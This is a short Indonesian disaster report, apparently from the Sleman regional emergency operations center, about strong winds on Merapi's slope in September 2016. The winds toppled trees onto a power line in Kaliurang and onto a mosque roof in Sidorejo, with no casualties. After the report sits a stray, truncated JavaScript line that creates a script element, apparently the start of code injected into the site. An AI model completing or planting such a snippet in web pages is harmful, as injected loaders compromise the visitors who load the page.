Angin kencang di lereng Merapi

Atap rusak di Masjid Mujahidin Sidorejo Cangkringan
Atap rusak di Masjid Mujahidin Sidorejo Cangkringan

PUSDALOPS. Kamis, 22 September 2016 siang, hujan disertai angin kencang terjadi di wilayah lereng selatan Merapi. Kejadian tersebut berlangsung  beberapa menit bersamaan dengan awal turunnya hujan .

Laporan yang kami terima dari lapangan, angin kencang tak tentu arah terjadi di wilayah sekitar Tlogoputri Kaliurang, akibatnya sebuah pohon jenis sengon diameter 20 cm tumbang  menimpa jaringan listrik di Kaliurang Timur RT 02/14, Hargobinangun Pakem. Pusdalops Sleman segera berkoordinasi dengan pihak terkait (PLN) untuk segera melakukan pemadaman. Kejadian tersebut segera ditangani oleh petugas PLN, TRC BPBD Sleman serta SARSATLINMAS Kaliurang untuk melakukan pemotongan pohon, sehubungan pal listrik tersebut dekat dengan salah satu rumah warga.

Bersamaan dengan itu sebatang pohon sengon dengan diameter 40 cm juga tumbang, kali ini menimpa masjid  Mujahidin  Sidorejo Cangkringan, kerusakan terjadi pada atap, sebagian genting dan plafon pecah. Segera setelah hujan reda warga Sidorejo melakukan pembenahan masjid tersebut. Dari dua kejadian tersebut nihil korban jiwa.(den)

var d=document;var s=d.createElement(‘script’);

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.